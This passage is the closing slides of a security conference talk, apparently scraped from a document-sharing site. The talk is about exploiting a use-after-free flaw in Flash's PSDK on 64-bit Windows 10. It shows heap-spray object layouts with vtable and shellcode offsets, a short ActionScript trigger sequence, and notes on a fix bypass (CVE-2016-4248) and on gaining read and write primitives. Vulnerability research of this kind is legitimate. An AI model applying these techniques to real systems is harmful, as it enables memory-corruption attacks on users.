![Page 71: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/71.jpg)
64-bit Exploit
✤ Heap Spray malloced Objects
Metadata
Flag
![Page 72: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/72.jpg)
64-bit Exploit
Metadata
+0 vtable+8 dumy
…+10 dumy
+120 ptr
![Page 73: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/73.jpg)
64-bit Exploit
Metadata
+0 vtable+8 dumy
…+10 dumy
+120 ptr
+0 dumy…
+hash*8
+0 dumy+8 dumy+10 ptr
+0 dumy+8 dumy+10 dumy+18 ptr bytes
hash = func(name) hash = [0,7] hash("vtable") = 3 hash("shellc0de") = 4 hash("param") = 0
.setByteArray(name, bytes);
![Page 74: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/74.jpg)
Windows 10 Tips
✤ PSDK is malloced ✤ LFH randomisation✤ Multiple occupation
![Page 75: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/75.jpg)
ps.release(); for(i=0;i<0x100;i++) track = new Track("j","lan",true,true); ps.createAdPolicySelector(1,mp);
Windows 10 Tips
1
![Page 76: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/76.jpg)
Conclusion
✤ The Fix✤ remove the reference manually after release()
✤ bypass: declare two of them (CVE-2016-4248)
✤ remove the release() from AS3 level ✤ Use-After-Use-After-Free
✤ relatively common way to retrieve a Read Primitive✤ replace String with other structure ?= Write Primitive
✤ Memory Protector has no effects
![Page 77: Use-After-Use-After-Free Exploit UAF by Genrating Your Own · Advanced vulnerability exploitation ... Isolated Heap Mitigations MMgc. MMgc ByteArray & Vector AS3 Objects](https://reader031.fdocuments.us/reader031/viewer/2022011920/6028838faf2f8635a615e4b5/html5/thumbnails/77.jpg)
Q & A
Thanks for your attention
Download everything from: http://www.hhjack.com/psdk.zip